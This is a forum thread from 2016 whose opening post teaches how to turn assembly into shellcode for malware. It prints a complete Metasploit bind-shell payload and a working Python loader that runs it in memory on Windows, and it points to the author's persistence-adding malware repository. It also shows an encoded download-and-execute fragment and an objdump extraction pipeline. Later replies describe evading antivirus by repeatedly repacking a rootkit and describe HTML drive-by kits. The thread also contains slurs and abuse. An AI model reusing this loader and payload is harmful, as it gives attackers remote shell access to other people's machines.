On converting ASM to Bytearray Shellcode and it's applications in malware.

2016-03-18 at 1:01 AM UTC

#1

The Self Taught Man Black Hole

Sup niggas. I posted this over at greysec(Which is a rather dank haxxing related forum that you should probably check out[MLT from TeamPoison posts there too and he's 1337 af]) so i figured i might xpost it here for your reading pleasure.

ASM is a powerful low level language suitable for a number of applications. One of those applications is in malware, shellcode is typically written in machine code such as ASM. However, if you have a sample of ASM that performs a specific operation such as spawning an OS shell or downloading and executing a binary from a remote host you might want to employ this functionality in a high level language such as Python or Ruby to create a more powerful piece of software/malware.

In order to do so however we can't just copy/paste ASM directly into a Python script. Instead, python reads the machine code in as a bytearray of shellcode. If you've worked with metasploit before you might recognize that this looks like the following.


"\xb8\xee\x7c\x98\x76\xdb\xc6\xd9\x74\x24\xf4\x5b\x31\xc9"
"\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x2d\x78\x7a\x83\x4d"
"\x69\xf8\x6c\xad\x6a\x9d\xe5\x48\x5b\x9d\x92\x19\xcc\x2d"
"\xd0\x4f\xe1\xc6\xb4\x7b\x72\xaa\x10\x8c\x33\x01\x47\xa3"
"\xc4\x3a\xbb\xa2\x46\x41\xe8\x04\x76\x8a\xfd\x45\xbf\xf7"
"\x0c\x17\x68\x73\xa2\x87\x1d\xc9\x7f\x2c\x6d\xdf\x07\xd1"
"\x26\xde\x26\x44\x3c\xb9\xe8\x67\x91\xb1\xa0\x7f\xf6\xfc"
"\x7b\xf4\xcc\x8b\x7d\xdc\x1c\x73\xd1\x21\x91\x86\x2b\x66"
"\x16\x79\x5e\x9e\x64\x04\x59\x65\x16\xd2\xec\x7d\xb0\x91"
"\x57\x59\x40\x75\x01\x2a\x4e\x32\x45\x74\x53\xc5\x8a\x0f"
"\x6f\x4e\x2d\xdf\xf9\x14\x0a\xfb\xa2\xcf\x33\x5a\x0f\xa1"
"\x4c\xbc\xf0\x1e\xe9\xb7\x1d\x4a\x80\x9a\x49\xbf\xa9\x24"
"\x8a\xd7\xba\x57\xb8\x78\x11\xff\xf0\xf1\xbf\xf8\xf7\x2b"
"\x07\x96\x09\xd4\x78\xbf\xcd\x80\x28\xd7\xe4\xa8\xa2\x27"
"\x08\x7d\x5e\x2f\xaf\x2e\x7d\xd2\x0f\x9f\xc1\x7c\xf8\xf5"
"\xcd\xa3\x18\xf6\x07\xcc\xb1\x0b\xa8\xd0\x82\x85\x4e\x7e"
"\x15\xc0\xd9\x16\xd7\x37\xd2\x81\x28\x12\x4a\x25\x60\x74"
"\x4d\x4a\x71\x52\xf9\xdc\xfa\xb1\x3d\xfd\xfc\x9f\x15\x6a"
"\x6a\x55\xf4\xd9\x0a\x6a\xdd\x89\xaf\xf9\xba\x49\xb9\xe1"
"\x14\x1e\xee\xd4\x6c\xca\x02\x4e\xc7\xe8\xde\x16\x20\xa8"
"\x04\xeb\xaf\x31\xc8\x57\x94\x21\x14\x57\x90\x15\xc8\x0e"
"\x4e\xc3\xae\xf8\x20\xbd\x78\x56\xeb\x29\xfc\x94\x2c\x2f"
"\x01\xf1\xda\xcf\xb0\xac\x9a\xf0\x7d\x39\x2b\x89\x63\xd9"
"\xd4\x40\x20\xe9\x9e\xc8\x01\x62\x47\x99\x13\xef\x78\x74"
"\x57\x16\xfb\x7c\x28\xed\xe3\xf5\x2d\xa9\xa3\xe6\x5f\xa2"
"\x41\x08\xf3\xc3\x43"

This is shellcode generated by metasploit, what this shellcode does when executed, is open port 8899 on the target Windows machine and listens for incoming connections over TCP. Once a connection has been established it spawns an OS shell.

Now if we were to employ this from within a python script it would look like this.


import os
import ctypes

def execute():
    # Bind shell
    shellcode = bytearray(
    "\xb8\xee\x7c\x98\x76\xdb\xc6\xd9\x74\x24\xf4\x5b\x31\xc9"
    "\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x2d\x78\x7a\x83\x4d"
    "\x69\xf8\x6c\xad\x6a\x9d\xe5\x48\x5b\x9d\x92\x19\xcc\x2d"
    "\xd0\x4f\xe1\xc6\xb4\x7b\x72\xaa\x10\x8c\x33\x01\x47\xa3"
    "\xc4\x3a\xbb\xa2\x46\x41\xe8\x04\x76\x8a\xfd\x45\xbf\xf7"
    "\x0c\x17\x68\x73\xa2\x87\x1d\xc9\x7f\x2c\x6d\xdf\x07\xd1"
    "\x26\xde\x26\x44\x3c\xb9\xe8\x67\x91\xb1\xa0\x7f\xf6\xfc"
    "\x7b\xf4\xcc\x8b\x7d\xdc\x1c\x73\xd1\x21\x91\x86\x2b\x66"
    "\x16\x79\x5e\x9e\x64\x04\x59\x65\x16\xd2\xec\x7d\xb0\x91"
    "\x57\x59\x40\x75\x01\x2a\x4e\x32\x45\x74\x53\xc5\x8a\x0f"
    "\x6f\x4e\x2d\xdf\xf9\x14\x0a\xfb\xa2\xcf\x33\x5a\x0f\xa1"
    "\x4c\xbc\xf0\x1e\xe9\xb7\x1d\x4a\x80\x9a\x49\xbf\xa9\x24"
    "\x8a\xd7\xba\x57\xb8\x78\x11\xff\xf0\xf1\xbf\xf8\xf7\x2b"
    "\x07\x96\x09\xd4\x78\xbf\xcd\x80\x28\xd7\xe4\xa8\xa2\x27"
    "\x08\x7d\x5e\x2f\xaf\x2e\x7d\xd2\x0f\x9f\xc1\x7c\xf8\xf5"
    "\xcd\xa3\x18\xf6\x07\xcc\xb1\x0b\xa8\xd0\x82\x85\x4e\x7e"
    "\x15\xc0\xd9\x16\xd7\x37\xd2\x81\x28\x12\x4a\x25\x60\x74"
    "\x4d\x4a\x71\x52\xf9\xdc\xfa\xb1\x3d\xfd\xfc\x9f\x15\x6a"
    "\x6a\x55\xf4\xd9\x0a\x6a\xdd\x89\xaf\xf9\xba\x49\xb9\xe1"
    "\x14\x1e\xee\xd4\x6c\xca\x02\x4e\xc7\xe8\xde\x16\x20\xa8"
    "\x04\xeb\xaf\x31\xc8\x57\x94\x21\x14\x57\x90\x15\xc8\x0e"
    "\x4e\xc3\xae\xf8\x20\xbd\x78\x56\xeb\x29\xfc\x94\x2c\x2f"
    "\x01\xf1\xda\xcf\xb0\xac\x9a\xf0\x7d\x39\x2b\x89\x63\xd9"
    "\xd4\x40\x20\xe9\x9e\xc8\x01\x62\x47\x99\x13\xef\x78\x74"
    "\x57\x16\xfb\x7c\x28\xed\xe3\xf5\x2d\xa9\xa3\xe6\x5f\xa2"
    "\x41\x08\xf3\xc3\x43")

    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
    ctypes.c_int(len(shellcode)),
    ctypes.c_int(0x3000),
    ctypes.c_int(0x40))

    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
    buf,
    ctypes.c_int(len(shellcode)))

    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_int(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0)))

    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

Calling the function execute() from within the script will now run the shellcode in memory. If you're interested in an example, i have a script on my github that employs this technique while copying the binary(once compiled) to the C:\Users directory and adding a registry entry to ensure persistence. The bind shell can be controlled by metasploit payload handler.

https://github.com/NullArray/Shellware

Anyway, say you have some custom machine code that you would like to employ in a similar manner. No problem, it so happens there's a Linux utility to assist us with exactly that.

In example, here's some encoded ASM that i generated with an unrelated script. For the sake of brevity i will not post the entire program but a sample so that you get a feel for what we're converting here.


xor eax,eax
push eax
push 0x22657841
pop eax
shr eax,0x08
push eax
mov eax,0x1d4f211f
mov ebx,0x78614473
xor eax,ebx
push eax
mov eax,0x3c010e70
mov ebx,0x5567524a
xor eax,ebx
push eax
mov eax,0x3c481145
mov ebx,0x78736c6c
xor eax,ebx
push eax
mov eax,0x4a341511
mov ebx,0x6d516d74
xor eax,ebx
push eax
mov eax,0x7d155e26
mov ebx,0x5370324f
xor eax,ebx
push eax
mov eax,0x300220
mov ebx,0x666c3864
xor eax,ebx
push eax
mov eax,0x4d69477f
mov ebx,0x6a496b58
xor eax,ebx
push eax
mov eax,0x1d2d0173
mov ebx,0x7042625d
xor eax,ebx

What the complete program does is downlaod a binary from a remote host and run it. To convert this we will use the utility called objdump and a regular expression using grep, after which the shellcode will be printed to the terminal. The commands are structured as follows:


objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Where you replace "PROGRAM" with the binary ASM file and the proper shellcode will be printed to the terminal in this format if everything went well.


\x26\xde\x26\x44\x3c\xb9\xe8\x67\x91\xb1\xa0\x7f\xf6\xfc
\x7b\xf4\xcc\x8b\x7d\xdc\x1c\x73\xd1\x21\x91\x86\x2b\x66
\x16\x79\x5e\x9e\x64\x04\x59\x65\x16\xd2\xec\x7d\xb0\x91
\x57\x59\x40\x75\x01\x2a\x4e\x32\x45\x74\x53\xc5\x8a\x0f

Voila, dank shellcode4u.

2016-03-18 at 1:57 AM UTC

#2

aldra JIDF Controlled Opposition

k couple of things to pad this out:

When you talk about 'shellcode' (or bytecode), it's really just machine code - a compiled program encoded to binary so that the processor can understand and perform the instructions. You're basically compiling a program, then collecting the binary code for later use. In terms of hacking or malware, it's usually so that you can dump them into a buffer for use with direct memory attacks.

The reason why you'd want to use ASSEMBLER to build your bytecode is because short of writing machine code by hand, it creates the smallest, most portable code possible. If you were to use a higher-level language like C, the machine code it generated would be much larger because it contains things like compiler flags, references to external libraries, file format headers and tonnes of other stuff - compiled C applications are almost always at least a few KB. If you're planning to use the code to exploit a buffer or heap overflow, for example, you need to keep your injection data as small as possible because you don't want to be trying to allocate large buffers in unused memory, let alone jam those huge amounts of data into the processor's registers.

In terms of the format usually given for bytecode:
\x26\xde\x26\x44\x3c\xb9\xe8\x67\x91\xb1\xa0\x7f\xf6\xfc those are formatted hex values. In programming, you often write hex values in the format of 0xFF where 0 is the offset and FF is the value of the byte-pair AT the offset. If you're entering a string of hex values (we use hex, by the way, because raw binary would take up way too much space to represent even a short value) you don't need to write the offset like 0x54,1x32,2x4F and the like because they're already in order - that's what the \x represents. Basically that the following byte pair as a hex value that comes after the previous one. The \x<value> format is a C standard that's commonly adopted by other (later) programming languages. '

I'll write some more later but those are a few points that made it very hard for me to understand back when I was first reading about memory exploits because everyone either assumed it was basic knowledge they didn't need to cover or they didn't fully understand the background of what they were doing.

2016-03-18 at 2:13 AM UTC

#3

-SpectraL coward [the spuriously bluish-lilac bushman]

Has to be under 7kb.

2016-03-18 at 2:15 AM UTC

#4

aldra JIDF Controlled Opposition

why 7kb specifically?

2016-03-18 at 2:28 AM UTC

#5

-SpectraL coward [the spuriously bluish-lilac bushman]

why 7kb specifically?

Because that's the maximum attack buffer size.

2016-03-18 at 3:01 AM UTC

#6

The Self Taught Man Black Hole

k couple of things to pad this out:

When you talk about 'shellcode' (or bytecode), it's really just machine code - a compiled program encoded to binary so that the processor can understand and perform the instructions. You're basically compiling a program, then collecting the binary code for later use. In terms of hacking or malware, it's usually so that you can dump them into a buffer for use with direct memory attacks.

The reason why you'd want to use ASSEMBLER to build your bytecode is because short of writing machine code by hand, it creates the smallest, most portable code possible. If you were to use a higher-level language like C, the machine code it generated would be much larger because it contains things like compiler flags, references to external libraries, file format headers and tonnes of other stuff - compiled C applications are almost always at least a few KB. If you're planning to use the code to exploit a buffer or heap overflow, for example, you need to keep your injection data as small as possible because you don't want to be trying to allocate large buffers in unused memory, let alone jam those huge amounts of data into the processor's registers.

In terms of the format usually given for bytecode:
\x26\xde\x26\x44\x3c\xb9\xe8\x67\x91\xb1\xa0\x7f\x f6\xfc those are formatted hex values. In programming, you often write hex values in the format of 0xFF where 0 is the offset and FF is the value of the byte-pair AT the offset. If you're entering a string of hex values (we use hex, by the way, because raw binary would take up way too much space to represent even a short value) you don't need to write the offset like 0x54,1x32,2x4F and the like because they're already in order - that's what the \x represents. Basically that the following byte pair as a hex value that comes after the previous one. The \x<value> format is a C standard that's commonly adopted by other (later) programming languages. '

I'll write some more later but those are a few points that made it very hard for me to understand back when I was first reading about memory exploits because everyone either assumed it was basic knowledge they didn't need to cover or they didn't fully understand the background of what they were doing.

Excellent addition to the thread. I'll admit low level processing/memory stuff isn't what i usually focus on so i consider your insight into this valuable.

2016-03-18 at 4:27 AM UTC

#7

Lanny Bird of Courage

Because that's the maximum attack buffer size.

Haha, all your supposed legendary experience and you've only ever seen one particular buffer overflow and now think that 7KB is is some natural limit on direct memory alteration attacks. That's rich.


objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

.

Does anyone know what all the string processing after the objdump invocation does? I got as far as "process lines that potentially have hex files but don't contain the string 'file'" before my eyes glazed over.

2016-03-18 at 12:55 PM UTC

#8

-SpectraL coward [the spuriously bluish-lilac bushman]

Haha, all your supposed legendary experience and you've only ever seen one particular buffer overflow and now think that 7KB is is some natural limit on direct memory alteration attacks. That's rich…

You don't know what you're dealing with here, son.

2016-03-19 at 11:43 AM UTC

#9

-SpectraL coward [the spuriously bluish-lilac bushman]

It's amusing that I discussed these exact topics years ago back on Totse, and everyone snickered and laughed and scoffed. "You can't use HEX in a drive-by injection script!!", they said. "Machine code won't work!!", they said. "ASM and VB is for kids!!", they said. Now it's all the rave.

2016-03-19 at 5:30 PM UTC

#10

The Self Taught Man Black Hole

It's amusing that I discussed these exact topics years ago back on Totse,

You didn't.

and everyone snickered and laughed and scoffed.

They didn't.

"You can't use HEX in a drive-by injection script!!",

You don't know what you're talking about.

they said. "ASM and VB is for kids!!"

No one that has even the slightest clue of what they're talking about says ASM is for kids. That being said, if by VB you mean Visual Basic it's still weaksauce, save for the fact Office macros are written in a language that closely resembles VB.

Now it's all the rave.

You have no clue what's all the rave. Besides code injection has been around for ages.

2016-03-19 at 8:48 PM UTC

#11

Lanny Bird of Courage

You don't know what you're dealing with here, son.

Hey, spectroll, if I showed you an example of a buffer overflow attack where the payload could be larger than 7KB would you admit you were wrong?

2016-03-19 at 9:26 PM UTC

#12

AngryOnion Big Wig [the nightly self-effacing broadsheet]

I love these threads,not because I know anything about code but by the way you guys argue.

2016-03-19 at 10 PM UTC

#13

-SpectraL coward [the spuriously bluish-lilac bushman]

Hey, spectroll, if I showed you an example of a buffer overflow attack where the payload could be larger than 7KB would you admit you were wrong?

Go right ahead, Lannykins. Prove me wrong.

Sure, you can write it, but that doesn't mean it will work. The reason for the limitation is because, after 7kb, the script may not run at all, and if it does, it may crash or only partially execute. For the script to be stable, the injected executable code must be under 7kb.

2016-03-19 at 11:04 PM UTC

#14

The Self Taught Man Black Hole

the injected executable code

What is it Spectral, an executable or code?

2016-03-21 at 2:33 AM UTC

#15

-SpectraL coward [the spuriously bluish-lilac bushman]

What is it Spectral, an executable or code?

Executable code is a type of code, you child rapist. Executables are executable files.

Hey, Chester. Have you ever heard of what's called an executable stub? Pretty neat little idea. What you do is bind a small "stub" to the beginning of the executable file, so that when your script builds the .exe from the shellcode, it builds the bound stub as well. Then the executable can perform customized operations on the target machine, depending on how you program the stub to handle its processes.

2016-03-21 at 4:44 AM UTC

#16

Sophie Pedophile Tech Support

Executable code is a type of code, you child rapist. Executables are executable files.

Yeah the thing is, all code is executable on the condition you don't have any errors.

2016-03-21 at 5:17 AM UTC

#17

-SpectraL coward [the spuriously bluish-lilac bushman]

Yeah the thing is, all code is executable on the condition you don't have any errors.

Not true. Even if the executable code produces errors, it can still be executable. Just think of PIDs. You can have a situation where some of the PIDs produced by the executable file can be broken, while others can still function normally. In some cases, you'd actually want errors, because the scanner is looking for code which produces no errors, backwards as that sounds. For example, if you take an old rootkit (which virus scanners already easily detect), and then run it through UPX, and then run it through ASPack, then run it through UPX again, that breaks SOME of the sub processes on the executable program, while leaving other sub processes fully functional, because certain sections of the program's code get all garbled from using the different packing methods back and forth. The virus scanner then passes right over it, even though a good majority of the code is still known viral code. The scanner doesn't want to produce a possible false positive, so it allows it. Meanwhile, the main process and some of the sub processes may still work... ie: opening port, calling home, replicating, etc. So yeah, even if the executable code is producing errors, it can still be executable.

[edit]

Lanny?

2016-03-21 at 6:34 AM UTC

#18

aldra JIDF Controlled Opposition

wow, no

packers, crypters and the PEXE file format are really outside of the scope of the original topic though

2016-03-21 at 8:18 AM UTC

#19

-SpectraL coward [the spuriously bluish-lilac bushman]

wow, no…

C'mon, now.

2016-03-21 at 1:12 PM UTC

#20

-SpectraL coward [the spuriously bluish-lilac bushman]

There are constructor kits out there which allow you to embed an executable file of your choice into a standard .html document using HEX, VB and shellcode. When the .html is loaded in the browser, the executable file is built "on-the-fly" into the target machine's temp folder and launched from that location. That is not outside the scope of this conversation.

User Controls

Navigation

On converting ASM to Bytearray Shellcode and it's applications in malware.